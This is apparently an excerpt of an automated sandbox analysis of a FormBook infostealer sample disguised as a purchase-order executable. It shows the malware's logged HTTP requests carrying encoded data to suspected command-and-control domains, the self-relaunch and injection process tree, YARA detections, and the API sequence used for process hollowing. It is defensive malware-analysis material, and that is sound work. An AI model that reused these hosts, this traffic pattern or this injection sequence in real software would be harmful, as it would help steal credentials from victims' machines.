                                                                        Dec 2, 2023 18:52:11.152064085 CET | 380 | IN | HTTP/1.1 405 Not Allowed
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:52:11 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        48 | 192.168.2.10 | 49760 | 107.178.250.177 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:52:13.483058929 CET | 508 | OUT | GET /ahec/?Ot=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy8WUnV35Ak22aw==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.77moea.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:52:13.770286083 CET | 354 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx/1.20.2
                                                                        Date: Sat, 02 Dec 2023 17:52:13 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 5208
                                                                        Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                        Vary: Accept-Encoding
                                                                        ETag: "65267254-1458"
                                                                        Cache-Control: no-cache
                                                                        Accept-Ranges: bytes
                                                                        Via: 1.1 google
                                                                        Connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        49 | 192.168.2.10 | 49761 | 37.97.254.27 | 80 | 5828 | C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:52:21.326864004 CET | 807 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.wrautomotive.online
                                                                        Origin: http://www.wrautomotive.online
                                                                        Referer: http://www.wrautomotive.online/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=0gIjKnK2BJtevHKZCgtS1sMyyVVH0vy66LHt8W/V4WLlF/aQfG2nKBXF9Es9EVY+CdEoTKgcS2HF3K2vsNPx6YLsFnskiMJsZhtZOdDD5myNK8Krm9SIURsvZOltOkzwkGL8UBoVQyz4HWczQMlaRKiRynzw/rH2yKNXfDpi7/lxF0BYPQ==
                                                                        Dec 2, 2023 18:52:21.507111073 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                        Cache-Control: no-cache
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                        50 | 192.168.2.10 | 49762 | 37.97.254.27 | 80
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 2, 2023 18:52:25.600060940 CET | 827 | OUT | POST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.wrautomotive.online
                                                                        Origin: http://www.wrautomotive.online
                                                                        Referer: http://www.wrautomotive.online/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Ascii: Ot=0gIjKnK2BJte9USZABtS0MMxrlVH9Py+6LDt8TfF4lvlEa+QY32nLBXFykt3K1ZTCdJVTLMcS2jF3Lqvs+3w7ILiIHsmmMJsZhtZOdHp5mqNKMarnZGLVRsueOltKkz0kGLSUAlyQxb4HUEzQ9lbbKit9Hy+/piI36p+Uwth6rQCNBtLIubPfLs658Np4sNI2E0KqWo=
                                                                        Dec 2, 2023 18:52:25.784513950 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                        Cache-Control: no-cache
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                        Target ID:0
                                                                        Start time:18:48:14
                                                                        Start date:02/12/2023
                                                                        Path:C:\Users\user\Desktop\PO_YTWHDF3432.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\PO_YTWHDF3432.exe
                                                                        Imagebase:0x600000
                                                                        File size:956'928 bytes
                                                                        MD5 hash:0BC4DF2DAA2BEA193866307038113708
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:18:48:15
                                                                        Start date:02/12/2023
                                                                        Path:C:\Users\user\Desktop\PO_YTWHDF3432.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\Desktop\PO_YTWHDF3432.exe
                                                                        Imagebase:0xe10000
                                                                        File size:956'928 bytes
                                                                        MD5 hash:0BC4DF2DAA2BEA193866307038113708
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:18:48:19
                                                                        Start date:02/12/2023
                                                                        Path:C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe"
                                                                        Imagebase:0x80000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:11
                                                                        Start time:18:48:20
                                                                        Start date:02/12/2023
                                                                        Path:C:\Windows\SysWOW64\isoburn.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\isoburn.exe
                                                                        Imagebase:0xea0000
                                                                        File size:107'008 bytes
                                                                        MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:13
                                                                        Start time:18:48:32
                                                                        Start date:02/12/2023
                                                                        Path:C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe"
                                                                        Imagebase:0x80000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:15
                                                                        Start time:18:48:44
                                                                        Start date:02/12/2023
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                        Imagebase:0x7ff613480000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                          Execution Graph

                                                                          Execution Coverage:10.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:125
                                                                          Total number of Limit Nodes:17
                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 049D146E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: e111262392372b8608f0d5d6251e1357f1ae92f1e107310eb9d76031299e8279
                                                                          • Instruction ID: f04b84957e941c8114234254d0662d3292b1ff67031b0238baf25250b833decc
                                                                          • Opcode Fuzzy Hash: e111262392372b8608f0d5d6251e1357f1ae92f1e107310eb9d76031299e8279
                                                                          • Instruction Fuzzy Hash: 0491DF31A046259BDB09CF6DC88066EFBF6EF89310B24C62AE4559B659CB74FC41CBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 049D197E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1040 (API call in graph: CreateProcessA)
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 049D197E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1097 (API call in graph: GetModuleHandleW)
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1154 4e7590c-4e75913 1155 4e7591c-4e759d9 CreateActCtxA 1154->1155 1157 4e759e2-4e75a3c 1155->1157 1158 4e759db-4e759e1 1155->1158 1165 4e75a3e-4e75a41 1157->1165 1166 4e75a4b-4e75a4f 1157->1166 1158->1157 1165->1166 1167 4e75a51-4e75a5d 1166->1167 1168 4e75a60 1166->1168 1167->1168 1170 4e75a61 1168->1170 1170->1170
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 04E759C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1171 4e7449c-4e759d9 CreateActCtxA 1174 4e759e2-4e75a3c 1171->1174 1175 4e759db-4e759e1 1171->1175 1182 4e75a3e-4e75a41 1174->1182 1183 4e75a4b-4e75a4f 1174->1183 1175->1174 1182->1183 1184 4e75a51-4e75a5d 1183->1184 1185 4e75a60 1183->1185 1184->1185 1187 4e75a61 1185->1187 1187->1187
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 04E759C9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1188 49d14b8-49d150e 1191 49d151e-49d155d WriteProcessMemory 1188->1191 1192 49d1510-49d151c 1188->1192 1194 49d155f-49d1565 1191->1194 1195 49d1566-49d1596 1191->1195 1192->1191 1194->1195
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 049D1550
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1210 49d14c0-49d150e 1212 49d151e-49d155d WriteProcessMemory 1210->1212 1213 49d1510-49d151c 1210->1213 1215 49d155f-49d1565 1212->1215 1216 49d1566-49d1596 1212->1216 1213->1212 1215->1216
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 049D1550
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1199 49d10c0-49d1113 1202 49d1115-49d1121 1199->1202 1203 49d1123-49d1153 Wow64SetThreadContext 1199->1203 1202->1203 1205 49d115c-49d118c 1203->1205 1206 49d1155-49d115b 1203->1206 1206->1205
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 049D1146
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1220 49d15a9-49d163d ReadProcessMemory 1224 49d163f-49d1645 1220->1224 1225 49d1646-49d1676 1220->1225 1224->1225
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 049D1630
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1229 4e7b470-4e7db1c DuplicateHandle 1231 4e7db25-4e7db42 1229->1231 1232 4e7db1e-4e7db24 1229->1232 1232->1231
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04E7D646,?,?,?,?,?), ref: 04E7DB0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1245 49d15b0-49d163d ReadProcessMemory 1248 49d163f-49d1645 1245->1248 1249 49d1646-49d1676 1245->1249 1248->1249
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 049D1630
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1235 49d10c8-49d1113 1237 49d1115-49d1121 1235->1237 1238 49d1123-49d1153 Wow64SetThreadContext 1235->1238 1237->1238 1240 49d115c-49d118c 1238->1240 1241 49d1155-49d115b 1238->1241 1241->1240
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 049D1146
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1253 49d13f8-49d147b VirtualAllocEx 1256 49d147d-49d1483 1253->1256 1257 49d1484-49d14a9 1253->1257 1256->1257
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 049D146E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0

                                                                          Control-flow Graph

                                                                          control_flow_graph 1261 4e7b900-4e7b948 1263 4e7b950-4e7b97f LoadLibraryExW 1261->1263 1264 4e7b94a-4e7b94d 1261->1264 1265 4e7b981-4e7b987 1263->1265 1266 4e7b988-4e7b9a5 1263->1266 1264->1263 1265->1266
                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04E7B761,00000800,00000000,00000000), ref: 04E7B972
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0

                                                                          APIs
                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04E7B761,00000800,00000000,00000000), ref: 04E7B972
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0

                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,04E7B4AC), ref: 04E7B6E6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0

                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 049D28ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0

                                                                          APIs
                                                                          • PostMessageW.USER32(?,?,?,?), ref: 049D28ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1262977297.00000000049D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_49d0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: m
                                                                          • API String ID: 0-3775001192

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: '
                                                                          • API String ID: 0-1997036262

                                                                          • Instruction Fuzzy Hash: B771C574B00248DFDF188BA5D45876EBBB2FFC9781F208029E806AB785DE749C85CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
